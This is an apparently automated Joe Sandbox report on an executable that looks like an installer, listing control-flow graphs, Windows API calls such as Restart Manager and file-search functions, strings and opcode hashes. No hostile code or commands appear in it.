                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoadVersion
                                                              • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                              • API String ID: 1968650500-3419246398
                                                              • Opcode ID: e7a86348d8f011b95a06015b0bab06b6210f60d72cb8efa7c77c846e57fe45c9
                                                              • Instruction ID: 1cbd638475316f18669290cc5db137bdc69b0bbe350ace6e5bf0246856dda450
                                                              • Opcode Fuzzy Hash: e7a86348d8f011b95a06015b0bab06b6210f60d72cb8efa7c77c846e57fe45c9
                                                              • Instruction Fuzzy Hash: CC11A5B4541740DBDA10FBA5BB85A2A32E9E72C715B08563BEC44AA1A2DB7C4448CF9C

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1674 423c1c-423c50 1675 423c52-423c53 1674->1675 1676 423c84-423c9b call 423b78 1674->1676 1678 423c55-423c71 call 40b44c 1675->1678 1681 423cfc-423d01 1676->1681 1682 423c9d 1676->1682 1711 423c73-423c7b 1678->1711 1712 423c80-423c82 1678->1712 1684 423d03 1681->1684 1685 423d37-423d3c 1681->1685 1686 423ca3-423ca6 1682->1686 1687 423d60-423d70 1682->1687 1688 423fc1-423fc9 1684->1688 1689 423d09-423d11 1684->1689 1692 423d42-423d45 1685->1692 1693 4240aa-4240b8 IsIconic 1685->1693 1690 423cd5-423cd8 1686->1690 1691 423ca8 1686->1691 1694 423d72-423d77 1687->1694 1695 423d7b-423d83 call 4241a4 1687->1695 1700 424162-42416a 1688->1700 1706 423fcf-423fda call 4181f0 1688->1706 1698 423f23-423f4a SendMessageA 1689->1698 1699 423d17-423d1c 1689->1699 1707 423db9-423dc0 1690->1707 1708 423cde-423cdf 1690->1708 1702 423e06-423e16 call 423b94 1691->1702 1703 423cae-423cb1 1691->1703 1704 4240e6-4240fb call 424860 1692->1704 1705 423d4b-423d4c 1692->1705 1693->1700 1701 4240be-4240c9 GetFocus 1693->1701 1709 423d88-423d90 call 4241ec 1694->1709 1710 423d79-423d9c call 423b94 1694->1710 1695->1700 1698->1700 1713 423d22-423d23 1699->1713 1714 42405a-424065 1699->1714 1715 424181-424187 1700->1715 1701->1700 1722 4240cf-4240d8 call 41f004 1701->1722 1702->1700 1723 423cb7-423cba 1703->1723 1724 423e2e-423e4a PostMessageA call 423b94 1703->1724 1704->1700 1717 423d52-423d55 1705->1717 1718 4240fd-424104 1705->1718 1706->1700 1750 423fe0-423fef call 4181f0 IsWindowEnabled 1706->1750 1707->1700 1727 423dc6-423dcd 1707->1727 1728 423ce5-423ce8 1708->1728 1729 423f4f-423f56 1708->1729 1709->1700 1710->1700 1711->1715 1712->1676 1712->1678 1730 424082-42408d 1713->1730 1731 423d29-423d2c 1713->1731 1714->1700 1733 42406b-42407d 1714->1733 1734 424130-424137 1717->1734 1735 423d5b 1717->1735 1744 424106-424119 call 4244e4 1718->1744 1745 42411b-42412e call 42453c 1718->1745 1722->1700 1782 4240de-4240e4 SetFocus 1722->1782 1741 423cc0-423cc3 1723->1741 1742 423eb5-423ebc 1723->1742 1724->1700 1727->1700 1747 423dd3-423dd9 1727->1747 1748 423cee-423cf1 1728->1748 1749 423e4f-423e6f call 423b94 1728->1749 1729->1700 1737 423f5c-423f61 call 404e54 1729->1737 1730->1700 1759 424093-4240a5 1730->1759 1756 423d32 1731->1756 1757 423f66-423f6e 1731->1757 1733->1700 1754 42414a-424159 1734->1754 1755 424139-424148 1734->1755 1758 42415b-42415c call 423b94 1735->1758 1737->1700 1765 423cc9-423cca 1741->1765 1766 423dde-423dec IsIconic 1741->1766 1767 423ebe-423ed1 call 423b24 1742->1767 1768 423eef-423f00 call 423b94 1742->1768 1744->1700 1745->1700 1747->1700 1751 423cf7 1748->1751 1752 423e1b-423e29 call 424188 1748->1752 1795 423e93-423eb0 call 423a94 PostMessageA 1749->1795 1796 423e71-423e8e call 423b24 PostMessageA 1749->1796 1750->1700 1799 423ff5-424004 call 4181f0 IsWindowVisible 1750->1799 1751->1758 1752->1700 1754->1700 1755->1700 1756->1758 1757->1700 1780 423f74-423f7b 1757->1780 1791 424161 1758->1791 1759->1700 1783 423cd0 1765->1783 1784 423da1-423da9 1765->1784 1773 423dfa-423e01 call 423b94 1766->1773 1774 423dee-423df5 call 423bd0 1766->1774 1808 423ee3-423eea call 423b94 1767->1808 1809 423ed3-423edd call 41ef68 1767->1809 1802 423f02-423f08 call 41eeb4 1768->1802 1803 423f16-423f1e call 423a94 1768->1803 1773->1700 1774->1700 1780->1700 1794 423f81-423f90 call 4181f0 IsWindowEnabled 1780->1794 1782->1700 1783->1758 1784->1700 1797 423daf-423db4 call 422c5c 1784->1797 1791->1700 1794->1700 1824 423f96-423fac call 412320 1794->1824 1795->1700 1796->1700 1797->1700 1799->1700 1825 42400a-424055 GetFocus call 4181f0 SetFocus call 415250 SetFocus 1799->1825 1822 423f0d-423f10 1802->1822 1803->1700 1808->1700 1809->1808 1822->1803 1824->1700 1830 423fb2-423fbc 1824->1830 1825->1700 1830->1700
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8e2e69a12e9eff459782c0c50b644f6d48cf10d105da74f526d2b860ae1f2e99
                                                              • Instruction ID: adb1057a9d0d7329e5210459a6b6756db00cf693e958207d3a560887342e2c6b
                                                              • Opcode Fuzzy Hash: 8e2e69a12e9eff459782c0c50b644f6d48cf10d105da74f526d2b860ae1f2e99
                                                              • Instruction Fuzzy Hash: EBE1A230700125EFD704EF69E989A6EB7B5EF94304F9480A6E545AB352C73CEE81DB08

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1989 467710-467726 1990 467730-4677e7 call 49514c call 402b30 * 6 1989->1990 1991 467728-46772b call 402d30 1989->1991 2008 467824-46783d 1990->2008 2009 4677e9-467810 call 41464c 1990->2009 1991->1990 2013 46783f-467866 call 41462c 2008->2013 2014 46787a-467888 call 495454 2008->2014 2015 467815-46781f call 41460c 2009->2015 2016 467812 2009->2016 2022 46786b-467875 call 4145ec 2013->2022 2023 467868 2013->2023 2024 46788a-467899 call 49529c 2014->2024 2025 46789b-46789d call 4953c0 2014->2025 2015->2008 2016->2015 2022->2014 2023->2022 2030 4678a2-4678f5 call 494db0 call 41a3e0 * 2 2024->2030 2025->2030 2037 467906-46791b call 451444 call 414b28 2030->2037 2038 4678f7-467904 call 414b28 2030->2038 2044 467920-467927 2037->2044 2038->2044 2045 46796f-467df5 call 4951ec call 495510 call 41462c * 3 call 4146cc call 4145ec * 3 call 460f68 call 460f80 call 460f8c call 460fd4 call 460f68 call 460f80 call 460f8c call 460fd4 call 460f80 call 460fd4 LoadBitmapA call 41d6c0 call 460fa4 call 460fbc call 4674ec call 469000 call 466b6c call 40357c call 414b28 call 466ea4 call 466eac call 466b6c call 40357c * 2 call 414b28 call 469000 call 466b6c call 414b28 call 466ea4 call 466eac call 414b28 * 2 call 469000 call 414b28 * 2 call 466ea4 call 41460c call 466ea4 call 41460c call 469000 call 414b28 call 466ea4 call 466eac call 469000 call 414b28 call 466ea4 call 41460c * 2 call 414b28 call 466ea4 call 41460c 2044->2045 2046 467929-46796a call 4146cc call 414710 call 420fa8 call 420fd4 call 420b78 call 420ba4 2044->2046 2176 467df7-467e4f call 41460c call 414b28 call 466ea4 call 41460c 2045->2176 2177 467e51-467e6a call 414a54 * 2 2045->2177 2046->2045 2184 467e6f-467f20 call 466b6c call 469000 call 466b6c call 414b28 call 495510 call 466ea4 2176->2184 2177->2184 2203 467f22-467f3d 2184->2203 2204 467f5a-468190 call 466b6c call 414b28 call 495520 * 2 call 42e8d0 call 41460c call 466ea4 call 41460c call 4181f0 call 42ed48 call 414b28 call 4951ec call 495510 call 41462c call 466b6c call 414b28 call 466ea4 call 41460c call 466b6c call 469000 call 466b6c call 414b28 call 466ea4 call 41460c call 466eac call 466b6c call 414b28 call 466ea4 2184->2204 2205 467f42-467f55 call 41460c 2203->2205 2206 467f3f 2203->2206 2265 468192-46819b 2204->2265 2266 4681d1-46828a call 466b6c call 469000 call 466b6c call 414b28 call 495510 call 466ea4 2204->2266 2205->2204 2206->2205 2265->2266 2267 46819d-4681cc call 414a54 call 466eac 2265->2267 2284 4682c4-4686e5 call 466b6c call 414b28 call 495520 * 2 call 42e8d0 call 41460c call 466ea4 call 41460c call 414b28 call 4951ec call 495510 call 41462c call 414b28 call 466b6c call 469000 call 466b6c call 414b28 call 466ea4 call 466eac call 42bbe0 call 495520 call 44e8c0 call 466b6c call 469000 call 466b6c call 469000 call 466b6c call 469000 * 2 call 414b28 call 466ea4 call 466eac call 469000 call 494db0 call 41a3e0 call 466b6c call 40357c call 414b28 call 466ea4 call 41460c call 414b28 * 2 call 495520 call 403494 call 40357c * 2 call 414b28 2266->2284 2285 46828c-4682a7 2266->2285 2267->2266 2384 4686e7-468704 call 44ffc8 call 450124 2284->2384 2385 468709-468710 2284->2385 2286 4682ac-4682bf call 41460c 2285->2286 2287 4682a9 2285->2287 2286->2284 2287->2286 2384->2385 2387 468734-46873b 2385->2387 2388 468712-46872f call 44ffc8 call 450124 2385->2388 2389 46875f-4687a5 call 4181f0 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 4690f4 2387->2389 2390 46873d-46875a call 44ffc8 call 450124 2387->2390 2388->2387 2405 4687a7-4687ae 2389->2405 2406 4687bf 2389->2406 2390->2389 2408 4687b0-4687b9 2405->2408 2409 4687bb-4687bd 2405->2409 2407 4687c1-4687d0 2406->2407 2410 4687d2-4687d9 2407->2410 2411 4687ea 2407->2411 2408->2406 2408->2409 2409->2407 2412 4687e6-4687e8 2410->2412 2413 4687db-4687e4 2410->2413 2414 4687ec-468806 2411->2414 2412->2414 2413->2411 2413->2412 2415 4688af-4688b6 2414->2415 2416 46880c-468815 2414->2416 2419 4688bc-4688df call 47bfd8 call 403450 2415->2419 2420 468949-468957 call 414b28 2415->2420 2417 468817-46886e call 47bfd8 call 414b28 call 47bfd8 call 414b28 call 47bfd8 call 414b28 2416->2417 2418 468870-4688aa call 414b28 * 3 2416->2418 2417->2415 2418->2415 2439 4688f0-468904 call 403494 2419->2439 2440 4688e1-4688ee call 47c178 2419->2440 2425 46895c-468965 2420->2425 2430 468a75-468aa4 call 42b97c call 44e84c 2425->2430 2431 46896b-468983 call 429fe8 2425->2431 2465 468b52-468b56 2430->2465 2466 468aaa-468aae 2430->2466 2447 468985-468989 2431->2447 2448 4689fa-4689fe 2431->2448 2461 468916-468947 call 42c814 call 42cbd0 call 403494 call 414b28 2439->2461 2462 468906-468911 call 403494 2439->2462 2440->2461 2456 46898b-4689c5 call 40b44c call 47bfd8 2447->2456 2454 468a00-468a09 2448->2454 2455 468a4e-468a52 2448->2455 2454->2455 2463 468a0b-468a16 2454->2463 2459 468a66-468a70 call 42a06c 2455->2459 2460 468a54-468a64 call 42a06c 2455->2460 2516 4689c7-4689ce 2456->2516 2517 4689f4-4689f8 2456->2517 2459->2430 2460->2430 2461->2425 2462->2461 2463->2455 2474 468a18-468a1c 2463->2474 2467 468bd5-468bd9 2465->2467 2468 468b58-468b5f 2465->2468 2476 468ab0-468ac2 call 40b44c 2466->2476 2478 468c42-468c4b 2467->2478 2479 468bdb-468bf2 call 40b44c 2467->2479 2468->2467 2480 468b61-468b68 2468->2480 2484 468a1e-468a41 call 40b44c call 406acc 2474->2484 2495 468af4-468b2b call 47bfd8 call 44cb1c 2476->2495 2496 468ac4-468af2 call 47bfd8 call 44cbec 2476->2496 2487 468c4d-468c65 call 40b44c call 469d68 2478->2487 2488 468c6a-468c7f call 46724c call 466fc8 2478->2488 2507 468bf4-468c30 call 40b44c call 469d68 * 2 call 469c08 2479->2507 2508 468c32-468c40 call 469d68 2479->2508 2480->2467 2490 468b6a-468b75 2480->2490 2526 468a43-468a46 2484->2526 2527 468a48-468a4c 2484->2527 2487->2488 2541 468cd1-468cdb call 414a54 2488->2541 2542 468c81-468ca4 call 42a050 call 40b44c 2488->2542 2490->2488 2499 468b7b-468b7f 2490->2499 2543 468b30-468b34 2495->2543 2496->2543 2509 468b81-468b97 call 40b44c 2499->2509 2507->2488 2508->2488 2539 468bca-468bce 2509->2539 2540 468b99-468bc5 call 42a06c call 469d68 call 469c08 2509->2540 2516->2517 2528 4689d0-4689e2 call 406acc 2516->2528 2517->2448 2517->2456 2526->2455 2527->2455 2527->2484 2528->2517 2552 4689e4-4689ee 2528->2552 2539->2509 2551 468bd0 2539->2551 2540->2488 2553 468ce0-468cff call 414a54 2541->2553 2571 468ca6-468cad 2542->2571 2572 468caf-468cbe call 414a54 2542->2572 2549 468b36-468b3d 2543->2549 2550 468b3f-468b41 2543->2550 2549->2550 2557 468b48-468b4c 2549->2557 2550->2557 2551->2488 2552->2517 2558 4689f0 2552->2558 2567 468d01-468d24 call 42a050 call 469ec8 2553->2567 2568 468d29-468d4c call 47bfd8 call 403450 2553->2568 2557->2465 2557->2476 2558->2517 2567->2568 2586 468d4e-468d57 2568->2586 2587 468d68-468d71 2568->2587 2571->2572 2574 468cc0-468ccf call 414a54 2571->2574 2572->2553 2574->2553 2586->2587 2588 468d59-468d66 call 47c178 2586->2588 2589 468d87-468d97 call 403494 2587->2589 2590 468d73-468d85 call 403684 2587->2590 2597 468da9-468dc0 call 414b28 2588->2597 2589->2597 2590->2589 2598 468d99-468da4 call 403494 2590->2598 2602 468df6-468e00 call 414a54 2597->2602 2603 468dc2-468dc9 2597->2603 2598->2597 2609 468e05-468e2a call 403400 * 3 2602->2609 2604 468dd6-468de0 call 42b0f4 2603->2604 2605 468dcb-468dd4 2603->2605 2607 468de5-468df4 call 414a54 2604->2607 2605->2604 2605->2607 2607->2609
                                                              APIs
                                                                • Part of subcall function 0049529C: GetWindowRect.USER32(00000000), ref: 004952B2
                                                              • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467ADF
                                                                • Part of subcall function 0041D6C0: GetObjectA.GDI32(?,00000018,00467AF9), ref: 0041D6EB
                                                                • Part of subcall function 004674EC: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046758F
                                                                • Part of subcall function 004674EC: ExtractIconA.SHELL32(00400000,00000000,?), ref: 004675B5
                                                                • Part of subcall function 004674EC: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 0046760C
                                                                • Part of subcall function 00466EAC: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467B94,00000000,00000000,00000000,0000000C,00000000), ref: 00466EC4
                                                                • Part of subcall function 00495520: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 0049552A
                                                                • Part of subcall function 0042ED48: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDB8
                                                                • Part of subcall function 0042ED48: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDD5
                                                                • Part of subcall function 004951EC: 73A1A570.USER32(00000000,?,?,?), ref: 0049520E
                                                                • Part of subcall function 004951EC: SelectObject.GDI32(?,00000000), ref: 00495234
                                                                • Part of subcall function 004951EC: 73A1A480.USER32(00000000,?,00495292,0049528B,?,00000000,?,?,?), ref: 00495285
                                                                • Part of subcall function 00495510: MulDiv.KERNEL32(0000004B,?,00000006), ref: 0049551A
                                                              • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,02129D64,0212B950,?,?,0212B980,?,?,0212B9D0,?), ref: 00468769
                                                              • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046877A
                                                              • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468792
                                                                • Part of subcall function 0042A06C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A082
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Menu$AppendExtractIconObject$A480A570AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectSelectSendSystemUserWindow
                                                              • String ID: $(Default)$STOPIMAGE$k H
                                                              • API String ID: 3271511185-4041106330
                                                              • Opcode ID: 8c5f56ff46f7a67da8681be0a4bf9e1c58ad281b7cd8555ea36c903984038836
                                                              • Instruction ID: 2b4e5e33b1fbe28ecfb2af168a793b611adbc31a6fcb8730d9662ddd01b2079a
                                                              • Opcode Fuzzy Hash: 8c5f56ff46f7a67da8681be0a4bf9e1c58ad281b7cd8555ea36c903984038836
                                                              • Instruction Fuzzy Hash: 6CF2C7386005208FCB00EB59D9D9F9973F5BF49304F1582BAF5049B36ADB74AC46CB9A
                                                              APIs
                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00475362,?,?,0049C1D0,00000000), ref: 00475251
                                                              • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00475362,?,?,0049C1D0,00000000), ref: 0047532E
                                                              • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00475362,?,?,0049C1D0,00000000), ref: 0047533C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Find$File$CloseFirstNext
                                                              • String ID: unins$unins???.*
                                                              • API String ID: 3541575487-1009660736
                                                              • Opcode ID: a837fad0235e4b9e7aba6803d3a4e161a7614f9d7543318200369ea6c4804c70
                                                              • Instruction ID: 9ba6e551af2be01ae54f2bf6d4feb37662207b66b60327addd096aea054bc42d
                                                              • Opcode Fuzzy Hash: a837fad0235e4b9e7aba6803d3a4e161a7614f9d7543318200369ea6c4804c70
                                                              • Instruction Fuzzy Hash: 333153706005489FDB10EB65D981ADE77B9EF44344F5080F6A80CAB3B2DBB89F418B58
                                                              APIs
                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AAF,?,?,-00000001,00000000), ref: 00452A89
                                                              • GetLastError.KERNEL32(00000000,?,00000000,00452AAF,?,?,-00000001,00000000), ref: 00452A91
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileFindFirstLast
                                                              • String ID:
                                                              • API String ID: 873889042-0
                                                              • Opcode ID: 8734e5af750e444322e05c8d8760e218afcb813f3cdff8847798d95c72a82f1b
                                                              • Instruction ID: 2517da8cadb6fb7e7a3bde91136fc32a544ec95f0d2c756002249f4fd287b9db
                                                              • Opcode Fuzzy Hash: 8734e5af750e444322e05c8d8760e218afcb813f3cdff8847798d95c72a82f1b
                                                              • Instruction Fuzzy Hash: B9F0F971A04604AB8B20DBA69D0149EB7ACEB46725710467BFC14E3292EAB94E048558
                                                              APIs
                                                              • GetVersion.KERNEL32(00000569,0046E422), ref: 0046E396
                                                              • CoCreateInstance.OLE32(00499B98,00000000,00000001,00499BA8,?,00000569,0046E422), ref: 0046E3B2
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CreateInstanceVersion
                                                              • String ID:
                                                              • API String ID: 1462612201-0
                                                              • Opcode ID: 8ad8c01d14ab9cfbb68706b1f8329e070a5efeb3acbbf88c6fea7131f03e9687
                                                              • Instruction ID: ca204bcfc643a6eeda20b237376823326e775e7ff9cf44b6f5c5a065e078b710
                                                              • Opcode Fuzzy Hash: 8ad8c01d14ab9cfbb68706b1f8329e070a5efeb3acbbf88c6fea7131f03e9687
                                                              • Instruction Fuzzy Hash: 80F0A035282200DEEB1097AADC45B4A37C1BB20718F40007BF440D7391E3FDD8908A5F
                                                              APIs
                                                              • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID:
                                                              • API String ID: 2299586839-0
                                                              • Opcode ID: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                              • Instruction ID: d3b8e551ebd18b966166ca098383beb9494d3946d3c482517005b7019d2e894c
                                                              • Opcode Fuzzy Hash: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                              • Instruction Fuzzy Hash: EEE0D87170021467D711A95A9C869F7B35CA758314F00427FB949EB3C2EDB8DE8046ED
                                                              APIs
                                                              • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424161,?,00000000,0042416C), ref: 00423BBE
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: NtdllProc_Window
                                                              • String ID:
                                                              • API String ID: 4255912815-0
                                                              • Opcode ID: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                              • Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
                                                              • Opcode Fuzzy Hash: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                              • Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: NameUser
                                                              • String ID:
                                                              • API String ID: 2645101109-0
                                                              • Opcode ID: cd9d261bbe345dbfbc1978f69ea3c80f8509ceaa1a51dcff4dfe5a18c54a8916
                                                              • Instruction ID: 445fb77b721d6e8bc33303137c5d79e403f1e24c04085a252f4bbff9531eb306
                                                              • Opcode Fuzzy Hash: cd9d261bbe345dbfbc1978f69ea3c80f8509ceaa1a51dcff4dfe5a18c54a8916
                                                              • Instruction Fuzzy Hash: 6AD0C271304704A3C700AAA99C825AA35DD8B84315F00483F3CC6DA3C3FABDDA481696
                                                              APIs
                                                              • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F54C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: NtdllProc_Window
                                                              • String ID:
                                                              • API String ID: 4255912815-0
                                                              • Opcode ID: 333668ea2a957bd6a9fe502da343e78d2fcb082c63b96445e07994a194d2f0c0
                                                              • Instruction ID: 55aff4e3ab0814f5b97a0c0db1ec4da333d3f7c11773d115dc143ade784a7ab4
                                                              • Opcode Fuzzy Hash: 333668ea2a957bd6a9fe502da343e78d2fcb082c63b96445e07994a194d2f0c0
                                                              • Instruction Fuzzy Hash: BAD05E7120010C7B9B00DE9CE840C6B33BC9B88700BA08825F918C7202C634ED5187A8

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
